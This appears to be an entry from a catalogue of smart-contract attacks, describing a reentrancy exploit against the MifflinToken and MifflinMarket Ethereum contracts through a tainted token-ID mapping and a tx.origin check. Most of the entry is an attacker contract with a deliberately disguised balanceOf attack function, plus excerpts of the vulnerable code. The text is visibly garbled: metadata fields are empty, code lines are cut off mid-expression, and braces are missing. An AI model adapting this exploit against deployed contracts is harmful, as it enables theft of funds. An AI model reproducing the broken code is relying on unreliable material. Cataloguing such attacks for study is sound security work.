Attack 08ΒΆ

Contract Name


Contract Address


Transaction Count


Invovled Ethers

0.1 Ethers

Length of the Call Chain

2 external function, 2 internal funciton

Victim Function


Attack Mechanisim

Attack code:

contract Attack is MifflinToken {
    address victim;
    address market;
    constructor() payable {}

    function setVictim(address _vic, address _market) {
        victim = _vic
        market = _market

    function prepareAttack() {"setToken(uint8, address)")), 1, this);

    function balanceOf(MifflinToken token) public {   // Disguised attack function eth)(bytes4(keccak256("contribution(uint256)")), 10);

    function() payable{
        p.CashOut(1 eth);

    function getvalue() returns (uint) {
        return this.balance;

Attacked code:

contract MifflinToken is Owned, TokenERC20 {
    function contribution(uint256 amount)internal returns(int highlow){
        totalContribution += msg.value;

        if (amount > highestContribution) {
            uint256 oneper = buyPrice * 99 / 100; // lower by 1%*
            uint256 fullper = buyPrice *  highestContribution / amount; // lower by how much you beat the prior contribution
            if(fullper > oneper) buyPrice = fullper;
            else buyPrice = oneper;
            highestContribution = amount;
            // give reward
            return 1;
        } else if(amount < lowestContribution){
            lowestContribution = amount;
            return -1;
        } else return 0;


contract MifflinMarket is Owned {
    modifier onlyOwnerOrigin{
        require(tx.origin == owner);

    function setToken(uint8 tid,address addy) public onlyOwnerOrigin { // Only add tokens that were created by exchange owner
        tokenIds[tid] = addy;

    function getRewardToken() public view returns(MifflinToken){
        return getTokenById(rewardTokenId);

    function getTokenById(uint8 id) public view returns(MifflinToken){
        require(tokenIds[id] > 0);
        return MifflinToken(tokenIds[id]);

    function highContributionAward(address to) public onlyTokens {
        MifflinToken reward = getRewardToken();
        //dont throw an error if there are no more tokens
        if(reward.balanceOf(reward) > 0){
            reward.give(to, 1);

In this case, the key condition defenses reentrancy attack is reward.balanceOf(reward) > 0 in function highContributionAward. However, reward can be easily tainted. It inherits value from tokenIds[id], which can also be easily taited by any access.

Attack. The attacker call setVictim function to specify the address to attack. Then attacker call prepareAttack``function to taint variable. Finally attacker call ``balanceOf to start attack.